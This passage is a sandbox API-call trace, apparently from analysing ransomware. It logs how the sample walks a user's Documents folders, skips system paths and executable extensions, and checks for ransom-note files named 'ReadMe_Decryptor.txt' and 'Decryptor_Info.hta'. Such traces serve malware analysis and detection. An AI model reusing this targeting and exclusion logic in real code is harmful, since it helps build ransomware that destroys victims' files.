hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7afb90 [0105.212] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.212] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb45e5e0, ftCreationTime.dwHighDateTime=0x1d5e675, ftLastAccessTime.dwLowDateTime=0x2f34bc0, ftLastAccessTime.dwHighDateTime=0x1d5dbaa, ftLastWriteTime.dwLowDateTime=0x2f34bc0, ftLastWriteTime.dwHighDateTime=0x1d5dbaa, nFileSizeHigh=0x0, nFileSizeLow=0x5ff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="wYI0n24YE.docx", cAlternateFileName="WYI0N2~1.DOC")) returned 1 [0105.212] lstrcmpW (lpString1="wYI0n24YE.docx", lpString2=".") returned 1 [0105.212] lstrcmpW (lpString1="wYI0n24YE.docx", lpString2="..") returned 1 [0105.212] lstrcmpiW (lpString1="wYI0n24YE.docx", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.212] lstrcmpiW (lpString1="wYI0n24YE.docx", lpString2="Decryptor_Info.hta") returned 1 [0105.212] PathFindExtensionW (pszPath="wYI0n24YE.docx") returned=".docx" [0105.212] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.212] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.212] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.212] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.212] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.212] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9a98 [0105.212] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.212] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb45e5e0, ftCreationTime.dwHighDateTime=0x1d5e675, ftLastAccessTime.dwLowDateTime=0x2f34bc0, ftLastAccessTime.dwHighDateTime=0x1d5dbaa, ftLastWriteTime.dwLowDateTime=0x2f34bc0, ftLastWriteTime.dwHighDateTime=0x1d5dbaa, nFileSizeHigh=0x0, nFileSizeLow=0x5ff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="wYI0n24YE.docx", cAlternateFileName="WYI0N2~1.DOC")) returned 0 [0105.223] FindClose (in: hFindFile=0x77e610 | out: hFindFile=0x77e610) returned 1 [0105.223] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x731e86f0, ftCreationTime.dwHighDateTime=0x1d5dd6a, ftLastAccessTime.dwLowDateTime=0x5f161220, ftLastAccessTime.dwHighDateTime=0x1d5e6c7, ftLastWriteTime.dwLowDateTime=0x5f161220, ftLastWriteTime.dwHighDateTime=0x1d5e6c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RW4ArI0Mpd", cAlternateFileName="RW4ARI~1")) returned 1 [0105.224] lstrcmpW (lpString1="RW4ArI0Mpd", lpString2=".") returned 1 [0105.224] lstrcmpW (lpString1="RW4ArI0Mpd", lpString2="..") returned 1 [0105.224] lstrlenW (lpString="RW4ArI0Mpd") returned 10 [0105.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\", lpString2="RW4ArI0Mpd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd" [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Windows") returned -1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\ProgramData") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Intel") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\msys32") returned 1 [0105.224] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Qt") returned 1 [0105.328] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\ProgramData") returned 1 [0105.328] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Program Files") returned 1 [0105.328] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Windows") returned -1 [0105.329] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="C:\\Program Files (x86)") returned 1 [0105.329] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\" [0105.329] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\") returned 71 [0105.329] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e610 [0105.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.348] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x731e86f0, ftCreationTime.dwHighDateTime=0x1d5dd6a, ftLastAccessTime.dwLowDateTime=0x5f161220, ftLastAccessTime.dwHighDateTime=0x1d5e6c7, ftLastWriteTime.dwLowDateTime=0x5f161220, ftLastWriteTime.dwHighDateTime=0x1d5e6c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.351] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41fa58b0, ftCreationTime.dwHighDateTime=0x1d5d9c8, ftLastAccessTime.dwLowDateTime=0xa0cdef70, ftLastAccessTime.dwHighDateTime=0x1d5d7b9, ftLastWriteTime.dwLowDateTime=0xa0cdef70, ftLastWriteTime.dwHighDateTime=0x1d5d7b9, nFileSizeHigh=0x0, nFileSizeLow=0x14878, dwReserved0=0x0, dwReserved1=0x0, cFileName="6d10pbgI59tZwQc.pptx", cAlternateFileName="6D10PB~1.PPT")) returned 1 [0105.351] lstrcmpW (lpString1="6d10pbgI59tZwQc.pptx", lpString2=".") returned 1 [0105.351] lstrcmpW (lpString1="6d10pbgI59tZwQc.pptx", lpString2="..") returned 1 [0105.351] lstrcmpiW (lpString1="6d10pbgI59tZwQc.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.351] lstrcmpiW (lpString1="6d10pbgI59tZwQc.pptx", lpString2="Decryptor_Info.hta") returned -1 [0105.352] PathFindExtensionW (pszPath="6d10pbgI59tZwQc.pptx") returned=".pptx" [0105.352] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.352] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.352] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.352] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.352] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.352] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.352] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.352] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.352] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7afc58 [0105.352] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.352] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7a8bb0, ftCreationTime.dwHighDateTime=0x1d5db27, ftLastAccessTime.dwLowDateTime=0xb8c7e7e0, ftLastAccessTime.dwHighDateTime=0x1d5de01, ftLastWriteTime.dwLowDateTime=0xb8c7e7e0, ftLastWriteTime.dwHighDateTime=0x1d5de01, nFileSizeHigh=0x0, nFileSizeLow=0x100e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="WIvbClqSIjfcdCzevi.odt", cAlternateFileName="WIVBCL~1.ODT")) returned 1 [0105.352] lstrcmpW (lpString1="WIvbClqSIjfcdCzevi.odt", lpString2=".") returned 1 [0105.352] lstrcmpW (lpString1="WIvbClqSIjfcdCzevi.odt", lpString2="..") returned 1 [0105.352] lstrcmpiW (lpString1="WIvbClqSIjfcdCzevi.odt", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.352] lstrcmpiW (lpString1="WIvbClqSIjfcdCzevi.odt", lpString2="Decryptor_Info.hta") returned 1 [0105.353] PathFindExtensionW (pszPath="WIvbClqSIjfcdCzevi.odt") returned=".odt" [0105.353] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0105.353] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0105.353] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0105.353] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0105.353] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0105.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7afd20 [0105.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.353] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7a8bb0, ftCreationTime.dwHighDateTime=0x1d5db27, ftLastAccessTime.dwLowDateTime=0xb8c7e7e0, ftLastAccessTime.dwHighDateTime=0x1d5de01, ftLastWriteTime.dwLowDateTime=0xb8c7e7e0, ftLastWriteTime.dwHighDateTime=0x1d5de01, nFileSizeHigh=0x0, nFileSizeLow=0x100e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="WIvbClqSIjfcdCzevi.odt", cAlternateFileName="WIVBCL~1.ODT")) returned 0 [0105.353] FindClose (in: hFindFile=0x77e610 | out: hFindFile=0x77e610) returned 1 [0105.353] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7a8bb0, ftCreationTime.dwHighDateTime=0x1d5db27, ftLastAccessTime.dwLowDateTime=0xb8c7e7e0, ftLastAccessTime.dwHighDateTime=0x1d5de01, ftLastWriteTime.dwLowDateTime=0xb8c7e7e0, ftLastWriteTime.dwHighDateTime=0x1d5de01, nFileSizeHigh=0x0, nFileSizeLow=0x100e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="WIvbClqSIjfcdCzevi.odt", cAlternateFileName="WIVBCL~1.ODT")) returned 0 [0105.354] FindClose (in: hFindFile=0x77e110 | out: hFindFile=0x77e110) returned 1 [0105.357] FindNextFileW (in: hFindFile=0x77e0d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7a8bb0, ftCreationTime.dwHighDateTime=0x1d5db27, ftLastAccessTime.dwLowDateTime=0xb8c7e7e0, ftLastAccessTime.dwHighDateTime=0x1d5de01, ftLastWriteTime.dwLowDateTime=0xb8c7e7e0, ftLastWriteTime.dwHighDateTime=0x1d5de01, nFileSizeHigh=0x0, nFileSizeLow=0x100e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="WIvbClqSIjfcdCzevi.odt", cAlternateFileName="WIVBCL~1.ODT")) returned 0 [0105.357] FindClose (in: hFindFile=0x77e0d0 | out: hFindFile=0x77e0d0) returned 1 [0105.357] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0105.357] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0105.357] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0105.357] lstrlenW (lpString="My Music") returned 8 [0105.357] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Windows") returned -1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\ProgramData") returned 1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.357] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Intel") returned 1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\msys32") returned 1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Qt") returned 1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\ProgramData") returned 1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Program Files") returned 1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Windows") returned -1 [0105.358] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="C:\\Program Files (x86)") returned 1 [0105.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0105.358] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned 49 [0105.358] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0xffffffff [0105.359] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 0xffffffff [0105.359] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0105.359] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0105.359] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0105.359] lstrlenW (lpString="My Pictures") returned 11 [0105.359] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Windows") returned -1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\ProgramData") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Intel") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\msys32") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Qt") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\ProgramData") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Program Files") returned 1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Windows") returned -1 [0105.360] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="C:\\Program Files (x86)") returned 1 [0105.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0105.361] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned 52 [0105.361] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0xffffffff [0105.361] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 0xffffffff [0105.361] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | 